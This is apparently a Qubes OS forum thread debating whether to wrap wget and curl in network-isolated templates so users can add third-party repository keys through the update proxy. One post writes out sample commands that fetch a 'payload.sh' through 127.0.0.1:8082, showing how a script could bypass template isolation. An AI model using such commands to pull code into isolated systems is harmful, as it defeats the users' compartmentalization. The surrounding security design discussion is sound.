Curl-proxy / wget-proxy scripts in Templates so users can add GPG distro keys linked to added external repositories

How is this a safeguard, though?

The net effect is the same, proxy or not: we’re giving the user a way of downloading arbitrary scripts from the internet into the templates.

Now, if you want to justify that as a convenience-versus-security trade-off, that’s one thing, but I don’t buy that doing it through a proxy is any safer than just exposing the network directly.

The three-second pause also seems really inelegant to me. We’re giving no information that the user didn’t have before executing the command in the first place. What are we even saying here? “This command might be safe or it might not be”? I thought the whole point of this endeavor was to optimize for the usability of a non-technical user; how are they going to know whether to wait three seconds or not?

Currently the templates have a really clear threat model in mind: bad software in them can threaten the compartmentalization of Qubes. Therefore, we disallow network access, pushing users toward the trusted repositories, which enforce signature checking, etc.

The aim of this change, to me, is to improve usability for our hypothetical non-tech-savvy journalist (to quote your other post) without breaking the above threat model. With that in mind, intercepting wget and curl seems too low-level.

I think it would be much cleaner to just add the keys of the common software this user wants to install. I’m not sure I buy the “no persona” software argument, as it seems this change has a very specific persona in mind as it currently stands.

The best thing you could do for this type of user is make it so they can install Signal/Wire/Session et al. through the standard package-manager mechanism, without manually downloading and verifying keys.

If people are really averse to this, then I think a cleaner approach would be to develop a mechanism for adding GPG keys/repos to templates in a safe way. This is more intuitive to me because it’s more explicit than blindly intercepting network commands and adding arbitrary pauses.

See this issue for some insight. Basically:

  • there is an Arch repo
  • the upstream team is unlikely to attempt to feed all distributions
  • signal-desktop is 100% open source … so any volunteer could start feeding e.g. Debian

Personally I can see one argument for the signal team wanting everyone to use their repo: speed of rolling out updates in case of compromise. By them fully controlling every step, they control how long it takes until updates are available. This might be important one day.

The ‘General Discussion’ category does not have ‘solutions’. Only ‘User Support’ topics do. That’s because a discussion can’t have a ‘solution’, just points of view. In this particular case, whether and what actions will be taken is decided entirely by the Qubes core team and not through any discussion had in this forum. Imagine the mess Qubes OS would be otherwise!

Fully agree.


And that is: having an organisation deploy those repos + GPG keys, or having Qubes take sides by deploying some repositories and not others.

For the other points, the only solution to your comments would be to remove the proxy in Templates (it is used and wrapped by dnf/apt today); keeping it could be interpreted as security by obscurity. A script downloaded in another qube, pushed into a template, and calling wget/curl with proxy arguments would work as-is, today.
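
To make that concrete, something along these lines is all such a script needs (the URL is just a placeholder; the proxy address is the default one discussed in this thread):

curl --proxy http://127.0.0.1:8082 -o /tmp/payload.sh https://example.com/install.sh
# or, equivalently, via the environment variables that wget honours:
http_proxy=http://127.0.0.1:8082 https_proxy=http://127.0.0.1:8082 wget -O /tmp/payload.sh https://example.com/install.sh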

We are mixing a lot of things here.

It’s quite the opposite, actually. Before, the author of a malicious script had to know that the target uses Qubes OS and therefore add code that would use the proxy on port 8082. Or the actual user had to understand what’s going on and provide the proxy address.

Now any malicious script will simply work, with a 3-second pause! What progress!

I, for one, take this away from the discussion: I will secure my UpdateProxy and share instructions on how to do so… so it becomes impossible to download ANYTHING that I have not whitelisted.


Ok. Point made @Sven :slight_smile:

I would continue to advocate for a wrapper that pauses WHILE TELLING THE USER what is about to happen next, but I now get that it would not serve the expected outcome… while reminding everyone that scripts calling the proxy directly would work today, without even that non-existent safeguard. And people who do not block that feature (which dnf/apt use to update Templates) could, as of today, have scripts download stuff, since no wrappers are available to pause or fail-safe those downloads. So what do we do with that?

Having a 3-second pause would open things up more widely; I get the point.
Following others’ considerations, it would be better to have the wrappers fail safe while explaining why, or to have an MOTD explaining the security properties/differences implemented in the TemplateVM.

Solutions are:

  • Deploy GPG keys + repos from packages.
  • Have an MOTD/wrappers educate users about what is going on and what to do.
  • Have users explicitly pass wget/curl/other arguments to be able to use those commands.
  • Have cloned TemplateVMs get internet access momentarily.

@Sven

Well, now more than ever, I would love to have tinyproxy logs to at least match hostnames/timestamps against dnf/apt update attempts. Otherwise, this proxy is mostly security by obscurity (relying on not knowing where the proxy is, and its address is not randomized per install but identical on every installation), and once known, it can be used by scripts.
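
If the UpdateProxy is the stock tinyproxy instance, a configuration roughly like the following would give both per-connection logs and a host whitelist. This is only a sketch: the config path is an assumption (on a default install it may be the tinyproxy-updates configuration in the qube providing the updates-proxy service), and the filter file name and host patterns are examples.

# Additions to the tinyproxy config used by the update proxy (path is an assumption):
LogFile "/var/log/tinyproxy/tinyproxy-updates.log"
LogLevel Connect                              # log each connection with hostname and timestamp
Filter "/etc/tinyproxy/updates-whitelist"     # one regular expression per line
FilterDefaultDeny Yes                         # deny every host not matching the filter file

# Example /etc/tinyproxy/updates-whitelist contents:
deb\.debian\.org
security\.debian\.org
.*\.fedoraproject\.org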

Again, the idea was to permit installation following upstream software installation guides. It was not meant to address malware download scripts; it evolved to pause the user before downloading, and now people want more protection from the proxy itself, having realised it is there and can be used by any script that knows about it.

Insurgo:
And that is: having an organisation deploy those repos + GPG keys, or having Qubes take sides by deploying some repositories and not others.

This is in effect what we do with Whonix. I think it’s a question of pragmatism: if an app is open source, used by millions, and highly relevant to a large part of our user base, then I don’t think it’s unreasonable to include its repo.
Even if I accept this argument, I still think the correct solution is to expose a safe way to explicitly add repos.

Insurgo:
For the other points, the only solution to your comments would be to remove the proxy in Templates (it is used and wrapped by dnf/apt today); keeping it could be interpreted as security by obscurity. A script downloaded in another qube, pushed into a template, and calling wget/curl with proxy arguments would work as-is, today.

I’m actually pretty shocked there isn’t a more granular whitelist here, if I’m honest. All the same, it’s very different to have a proxy at a lower level for the purpose of making the package manager work, as opposed to making this an idiom that is exposed to the user.

Sven:
It’s quite the opposite, actually. Before, the author of a malicious script had to know that the target uses Qubes OS and therefore add code that would use the proxy on port 8082. Or the actual user had to understand what’s going on and provide the proxy address.
Now any malicious script will simply work, with a 3-second pause! What progress!
I, for one, take this away from the discussion: I will secure my UpdateProxy and share instructions on how to do so… so it becomes impossible to download ANYTHING that I have not whitelisted.

Completely agree.


I get that and also where you are coming from. And I am not opposed to making Qubes OS easier to use, quite the opposite. However, IMHO this should NEVER come at the cost of lowering the default level of security provided.

My point of view is that I always found it icky that the only thing between a malicious install script in a template and the internet was the knowledge that there is a proxy at port 8082. Then @unman’s post confirmed to me that Qubes OS was once more secure in this regard, and that this barrier was lowered in the name of convenience. I am in no position to judge or re-evaluate past decisions made by people much smarter than me. However, for me this thread has made it impossible to ignore this itch.

Luckily there is nothing stopping me from either reintroducing a whitelist to apt-cacher-ng (I don’t use tinyproxy) or simply having a dedicated proxy VM for the UpdateProxy and configuring its firewall. Or maybe @adw will once again post a key insight that makes me re-evaluate this. :wink:
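
For the dedicated-proxy-VM variant, a rough sketch from dom0 might look like this. The qube name and mirror hostnames are examples only, and pinning specific hosts can break mirror redirects, so treat it as an illustration rather than a recipe:

qvm-firewall sys-update-proxy del --rule-no 0                  # drop the default allow-all rule
qvm-firewall sys-update-proxy add accept dsthost=deb.debian.org
qvm-firewall sys-update-proxy add accept dsthost=security.debian.org
qvm-firewall sys-update-proxy add drop                         # block everything else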

But this is a separate topic from your thread. I think with the MOTD we found a good compromise, and I hope it will get adopted.

Thank you also for all your hard work on Heads. It is a cornerstone of my setup. I’ll probably be rocking this T430 with Ivy Bridge for the rest of my days unless some kind of miracle happens (open architecture).


@marmarek @unman @patrick.whonix (you are not here?) @fepitre @Demi:
Then I am really questioning the current Qubes Template approach with the proxy, and would love to see what it was before, what changed, and where it stands now.

Following the reactions of many participants in this thread, it seems the proxy logic permitting dnf/apt was pure magic to them, and once exposed it caused a strong reaction. Learning that wide internet access from a TemplateVM is available via http://127.0.0.1:8082 blew their minds, now that they see this principle was, if we abuse the language, security by obscurity.

Some are looking to close it down further (@Sven), while others are disappointed that some scripts might already be using it. My attempt to facilitate this usage exposed its existence; @unman pointed to some past disagreement about earlier changes that I cannot directly point back to. The fact persists: that proxy is currently effective, and people are against using it directly for better UX (making it easier to follow official software installation guides) because some random script could use it too, targeting a proxy that is available in all Q4.0/Q4.1 TemplateVMs to permit dnf/apt updates from the default, currently Qubes-trusted, repositories.

This dichotomy is making me uncomfortable, personally. The information is out there. If we prohibit users from using curl/wget because scripts would too easily use those binaries, it’s just a matter of time and/or intense research before scripts appear that use http://127.0.0.1:8082 to target Qubes users and bypass TemplateVM security measures. Yet we do not want to improve UX by having wrappers pause external downloads, while being aware that such scripts might exist and that some Qubes users might already have run into them and compromised their Templates.

We now fall back to wanting an MOTD to educate users about the TemplateVM limitations/security properties that keep them from installing such applications directly, while I now agree with @Sven (on multiple points) and @laurel.straddle:

That such proxy exposure, even if not facilitated, still exists, and as of now is more a security-by-obscurity measure than anything else.

Please point to the PRs/issues that made these changes happen upstream. I would like to see the reasoning for hiding its usage rather than securing it, or understand why a proxy was chosen over firewall rules; to understand the before/after of those discussions and the technical/UX justifications and considerations that made the change happen.

@laurel.straddle To me, that use case is a perfectly good example for an app qube (where the built application can be launched from its build path) or a standalone qube, where the user is experimenting. The TemplateVM use case is the user who wants to install trusted upstream software per its installation guide and expects those trusted instructions to just work (because wget/curl are used everywhere in them), while that software is not part of most ecosystems’ repositories.

If a user wants to install Guix on top of Debian, I expect that user to be technical enough to clone a TemplateVM, open internet access to it, and do what he wants.

But to me, once again, limiting UX with some obscure, undocumented protection that the user cannot comprehend in situ (hence wrappers that block/delay being a good way forward if we keep the proxy) goes against all UX principles (@ninavizz / @marmarek, please debate the issue and come back with a settlement!!!).

We cannot have a one-size-fits-all. But the wrapper principle exposed in this PoC could, as far as the current discussion goes, simply have extended the 3-second warning to 30 seconds:

With a Qubes-configurable delay, set from the Qubes Template GUI or via qvm-prefs, toggling an “advanced_user” or “proxy_delay” option to deal with the situation, documented properly. But we need to take a stance here. Security by obscurity is a big no to me, and I guess to most of the Qubes user base. @unman: please help me here.
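
As a side note, the existing dom0 mechanism for arbitrary per-VM flags is qvm-features rather than qvm-prefs; a sketch of how such a toggle might be stored (the “proxy_delay” name is the hypothetical one proposed above, not an existing Qubes feature):

qvm-features debian-11 proxy_delay 30   # hypothetical flag the wget/curl wrappers would read

How the wrappers inside the template would read that value is left open here.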

I understand all points of view here. But as of now, we have a proxy which most thought was offering more protection than it actually does. The fact is that it can be called directly, and TemplateVM network restrictions can be totally and easily bypassed by scripts, which is the reason this PoC is rejected. At the same time, the current implementation is the reason this PoC came to life, because it goes against UX principles. But the PoC is rejected because it exposes the current implementation’s limits? Well, the current implementation is then wrong; sorry, but that is the consequence. Otherwise, the current implementation would limit the scope of the proxy. Don’t get me wrong: I understand that the proxy permits dnf/apt access. But the fact that it is fixed at 127.0.0.1:8082, and that, now that this is known, some want to change it, exposes its limits. And the past, maybe better, implementation seems to have jumped too far to one extreme, and now is the time to think of something better. Otherwise, a wrapper around the implementation should have fixed the UX problems. That is my opinion. We can document it, but scripts simply being able to download stuff will still be a possibility, which is why people reject the PoC.

Reactions are contradictory. Someone from the Qubes team needs to present alternatives that would limit such proxy usage, and explain the changes that happened before, pointing to the past discussions/issues/PRs and the UX concerns they addressed, one way or the other.

I cannot emphasise this enough: a GUI will have to deal with the same problems of being able to at least import GPG public keys and add additional repository URLs. Packaging all GPG keys and repositories is simply not possible, and partly addressing this issue will just make it pop up again later on. It was asked again and again and again. Meanwhile, the Template proxy sitting on 127.0.0.1:8082 is now a concern, the justification for not accepting the current PoC being that a random script would have access to the internet.

Well, scripts found online to work around the current implementation’s limitations are probably just using the proxy directly, as we speak.

This was all news to me. (I had been vaguely aware of these historical events as they happened but didn’t understand the specifics or implications until you clearly explained them.) You might consider opening an issue to (re-?)improve the security of the default configuration (in the spirit of secure defaults), since the vast majority of Qubes users will probably never be aware of your instructions and even fewer will implement them.

On the other hand, I’d understand if one were reticent to open an issue that relitigates a matter about which @marmarek has already decided. I don’t know what the deciding argument was, but if I had to guess, just based on general Qubes principles, it might’ve been that installation scripts that run in templates are already trusted (or, perhaps more precisely, that each template is already assumed to be only as trusted as the installation scripts that run in it). So, perhaps a thread here or on qubes-devel might be more appropriate (either a new one or a revival of the old one, if anyone can find it).

His username is @adrelanos.


A post was split to a new topic: Why does the UpdateProxy not have a whitelist?

A post was merged into an existing topic: Why does the UpdateProxy not have a whitelist?

@adw For some reason, I missed that point before. Of course, deploying repository information and a GPG key doesn’t make sense without installing the desired software in the template: the user is following upstream instructions to add the repo + GPG key + install the software.

Of course, adding a repository (no problem, no network access required) will work, but the package won’t install unless the GPG key is downloaded. Per upstream documentation, one last time, that either requires sudo to call wget/curl and put the file directly where it is expected, or calling wget/curl without root privileges and then using root privileges to put the file in place (see the Signal/Session examples in the OP). In every case I have personally observed, either curl or wget is used in those installation guides, and in most scripts I have seen, curl/wget is used to fetch content online.
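
Paraphrased, the two shapes those upstream instructions usually take are roughly the following (illustrative names and URLs, not any vendor’s exact commands):

# (a) root downloads the key directly into place:
sudo wget -O /usr/share/keyrings/example-archive-keyring.gpg https://example.com/key.gpg
# (b) the user downloads, then root moves the key into place:
wget -O- https://example.com/key.asc | gpg --dearmor > example-archive-keyring.gpg
sudo mv example-archive-keyring.gpg /usr/share/keyrings/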

This is why, even though time has passed and you made modifications to the core documentation for software installation (good!), I still think wrappers around wget/curl would address the situation here until we come up with a better approach.

Those wrappers, detecting that we are in a template without internet access (the default), should offer a non-blocking warning of what is going to happen next: what wget/curl is, what URL is about to be downloaded, and a chance for the user to cancel the operation (pause 3 seconds). I remind again that if a script does 3 downloads, the wrappers will be called 3 times, pause 3 times, and warn the user 3 times. We could even go further here and also point the user to the possibility of calling qvm-volume revert template_name:root if it is caught too late. Maybe this is a precedent to call for education, while not modifying the OS (wrapping is not modifying, but intercepting).
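
A minimal sketch of the kind of wrapper meant here follows; it is illustrative only, not the actual PoC code, and the network-detection heuristic, paths and messages are assumptions:

#!/bin/bash
# Hypothetical wrapper, e.g. installed as /usr/local/bin/wget so it shadows /usr/bin/wget.
REAL_WGET=/usr/bin/wget
PROXY=http://127.0.0.1:8082    # default update proxy discussed in this thread

# Crude check: if the qube has a default route it has direct networking, so just run wget.
if ip route 2>/dev/null | grep -q '^default'; then
    exec "$REAL_WGET" "$@"
fi

echo "This TemplateVM has no direct network access; the download would go through the update proxy." >&2
echo "About to run: wget $*" >&2
echo "Press Ctrl+C within 3 seconds to cancel (later: qvm-volume revert <template>:root from dom0)." >&2
sleep 3

exec env http_proxy="$PROXY" https_proxy="$PROXY" "$REAL_WGET" "$@"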

Otherwise, there is the approach proposed by @Demi: having them deployed (software repositories are there, keys are deployed, which means repository information is fetched at each template update whether the software is installed or not). The question with that approach would be whether the Qubes packages containing those additional repositories and GPG keys would be deployed by default, and whether they would be part of the default Templates shipped by the Qubes OS team. Note that your own reasoning applies here, @adw: it would not make any sense to deploy GPG keys without deploying repository definitions. But as opposed to your point: it would make sense to deploy GPG keys and repository definitions without installing the software in question.
@adw @deeplow @Demi: in that case, if Qubes decides to go in that direction to resolve the problem, packaged repositories + GPG keys should probably be individual packages, or persona/use-case related; I’m not sure of the best avenue from here. Maybe communication-related open-source repositories (Signal, Element, Session, etc.). But in my mind the wrapper wins again for other reasons, one being that it does not poke repositories for software that is not installed, which reduces network consumption, and it does so without the user opening network access to a template. On that note, I keep receiving questions on a daily basis about how to deploy those GPG keys, even though upstream instructions have been updated. The obvious reason for that is, and I agree:

So again, I would advocate for:

Which would be non-blocking while educating, on the spot, for all the use cases covered here, whether script-driven or manual installation. Three seconds is not much to wait if a user is doing this for the first time. Users who are installing untrusted repositories and software would probably follow the updated core Qubes software installation guide and assign network access.

The wrappers could just warn the user that he is downloading something, without pausing the download. And the same wrappers would be called in Qubes… as in the latest PoC.

Reminder:

I am still convinced this wrapper approach would be better than what we have now.
The other option is to strengthen the proxy as it was before, so that trusted repositories are used normally in TemplateVMs and installing anything untrusted requires assigning network access to the Template per the updated core docs. But the current implementation is, to me, still questionable, since it permits calling wget/curl through the proxy to do anything. (The wrapper would still catch that, by the way, in the current PoC.)


Because those external documentation guides are less than optimal for security.

@marmarek unfortunately, your export solution here, without an additional hack, won’t permit installation of Element per the upstream instructions, since their wget call is made with sudo. So simply exposing the proxy to the current user won’t just work.

export https_proxy=http://127.0.0.1:8082
sudo wget -O /usr/share/keyrings/element-io-archive-keyring.gpg https://packages.element.io/debian/element-io-archive-keyring.gpg

This results in name resolution failing in wget (since the sudo environment doesn’t have the proxy variable), without giving the user any insight into what to do next.


Please do not re-invent extrepo before checking whether extrepo fulfills this use case.

extrepo

External repository manager

External repositories are additional software package repositories that are not maintained by Debian. Before extrepo, maintainers of such repositories would suggest that you download and execute an (unsigned) shell script as root, or that you download and install their (unsigned) package, which is not ideal for security.

The extrepo package tries to remedy this, by providing a curated list of external repositories that can be enabled by a simple command, allowing unsigned scripts to be replaced by a simple “extrepo enable example.com_repo”.

Note, however, that while the repositories are curated, and that any repositories with malicious content will be removed and/or disabled when detected, no warranty is made by the Debian project as to the security or quality of the software in these third-party repositories.

They have a huge collection of repositories and signing keys already:

That would require:

sudo -E

-E stands for --preserve-environment. sudo clears environment variables by default. Yeah, Linux is really complex and complicated.

But indeed. Users usually won’t know that. And upstream documentation will just refer to sudo without -E.
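
For reference, the Element example from above would then become something like this (assuming the default template update proxy and a sudoers policy that honours -E):

export https_proxy=http://127.0.0.1:8082
sudo -E wget -O /usr/share/keyrings/element-io-archive-keyring.gpg https://packages.element.io/debian/element-io-archive-keyring.gpg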

Do you mean these repositories enabled by default? If,

  • yes: That’s insecure, because every added repository has full control over all files inside the template.
  • no: Then users following upstream instructions would still be confused and be shown an error message as soon as they use wget/curl.

Or do you mean something like extrepo?

That seems like a ton of work. extrepo has already added 102 custom repositories.

Also, with that, Qubes would be getting into a business similar to the certificate-authority business, having to decide which repos to add and which ones to refuse.


@Demi @adrelanos I like that approach; it would be amazing if that worked out of the box.

Unfortunately, @adrelanos, there is no network by default. It would have been nice if extrepo permitted deployment without network access, but that doesn’t seem to be the case:

user@debian-11:~$ extrepo enable signal
Need to be root to modify external repository configuration!
	...propagated at /usr/bin/extrepo line 123.
user@debian-11:~$ sudo extrepo enable signal
Could not download index YAML file:
Invalid argument at /usr/bin/extrepo line 123.
user@debian-11:~$ sudo extrepo update signal
Could not download index YAML file:
Invalid argument at /usr/bin/extrepo line 123.

Digging down, the repos are provided by extrepo-data, which doesn’t have an installable bullseye candidate (debian-11).

I see under the Whonix-referenced link that it is provided in the whonix-16 workstation, where extrepo-offline-data is installable in the template. Even when it is installed, if the template is cut off from the network, enabling the signal repo still requires an internet gateway, unless I missed something. Newer upstream versions add an --offlinedata flag, but this is not yet available: it is not installable under the debian-11 template, nor usable to install software today under the whonix-16 template without attaching a gateway to the template, as in the preceding discussion.

The question here, again, is what to do next to address end users’ need to install additional software: @marmarek.


I’m a bit confused by all of this, but I did run into the situation where I couldn’t get hold of the flatpak without all those keyring gyrations.

So, I did this (I’d like it critiqued by the “hard-core” security-minded people here). It assumes the flatpak itself is trusted even if the delivery system is not.

Clone whatever qube you use for internet work (or fire up a terminal in a disposable qube). Run all of those commands in that qube, but as the last command do an apt download rather than an apt install.

Copy the resulting file to another qube (I’ve set up one with no network connections to act as a “repository” for such things). If the qube doing the downloading was a clone rather than a disposable, delete that qube.

When creating the template, copy the file from the repository qube to the template, and run the install in the template.

The template never touches the internet. This process can be mostly automated, though you might want one script for the download and another for the install. However… the copy from the downloading qube to the repository, and from the repository to the installing template, will both require user confirmation (or is there some way, when dom0 is issuing the command to copy from qube A to qube B, to bypass this?).

If using scripts, I find it best to echo the name of the file AND the name of the destination qube before doing the move, so you are reminded which system to select. I also do this copy either at the beginning of the script (if possible, e.g. the repository-to-template copy) or at the end (if possible, e.g. the downloader-to-repository copy), so that you can start the script and walk away from it shortly thereafter. If the popup is at the end of the script and you walked away before it appeared, that’s fine, because the script will end seconds after you confirm it. I just want to avoid a long stretch of work being delayed because you got bored watching it and walked away, then came back only to find you have to confirm it and wait fifteen more minutes; time which could have elapsed while you were taking your break. [All of this, of course, is moot if there is some way for a dom0 command copying from qube A to qube B to bypass the user confirmation.]
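
For reference, a rough sketch of the in-qube half of this workflow, assuming a Debian-based template and using some-package and repository-qube as stand-in names (qvm-copy still pops up the usual confirmation dialog):

# In the cloned or disposable downloading qube:
sudo apt update
apt download some-package            # fetch the .deb without installing it
qvm-copy some-package_*.deb          # select the "repository" qube in the dialog

# Later, in the template, after copying the file over from the repository qube:
sudo apt install ~/QubesIncoming/repository-qube/some-package_*.deb

apt treats an argument containing a path as a local .deb file, so no repository access is needed for the final install.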

Option: add a wrapper that by default sets the http_proxy environment variable, so that even if the user just types extrepo in a TemplateVM it will already have the required http_proxy environment variable set?
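
A minimal sketch of what such a wrapper could look like, assuming (as this suggestion does) that extrepo’s downloader honours the proxy environment variables; the path and proxy address are the defaults discussed in this thread:

#!/bin/sh
# Hypothetical /usr/local/bin/extrepo wrapper: point extrepo at the template update proxy.
export http_proxy=http://127.0.0.1:8082
export https_proxy=http://127.0.0.1:8082
exec /usr/bin/extrepo "$@"

If /usr/local/bin precedes /usr/bin in sudo’s secure_path (as on a default Debian install), this also sidesteps the sudo -E problem, since the wrapper itself exports the variables before the real binary runs.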

Yeah. I suggest lowering the goal and accepting that this might only get implemented in Debian 12 (bookworm).

Otherwise, looking at how this discussion went, my experience tells me nothing will be implemented for Debian 11 anyhow. So extrepo seems the most realistic route to me, even if only for Debian stable + 1 or even Debian stable + 2.

Any missing functionality in the Debian 12 version of extrepo I suggest raising upstream, which in my experience a while ago was fast, friendly and supportive. Also, extrepo, while very much appreciated and worthwhile to have been created, isn’t rocket science. The Qubes team could submit patches upstream. Perhaps a “plug-in” architecture, or some option to set the environment variable when running inside Qubes, might be acceptable to extrepo upstream to avoid the wrapper for networking.


I checked on the gpg proxy flag not working properly when trying to download a key from a keyserver, and found that it is a known bug. But is there a working solution for the Ruby gem bundler? I tried exporting https_proxy, but without success.
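
For reference, a couple of things one might try (unverified in a template here; the proxy address is the template default):

# RubyGems has an explicit proxy option:
gem install --http-proxy http://127.0.0.1:8082 some_gem
# Bundler generally reads the proxy from the environment; both spellings may matter:
export http_proxy=http://127.0.0.1:8082 https_proxy=http://127.0.0.1:8082
export HTTP_PROXY=$http_proxy HTTPS_PROXY=$https_proxy
bundle install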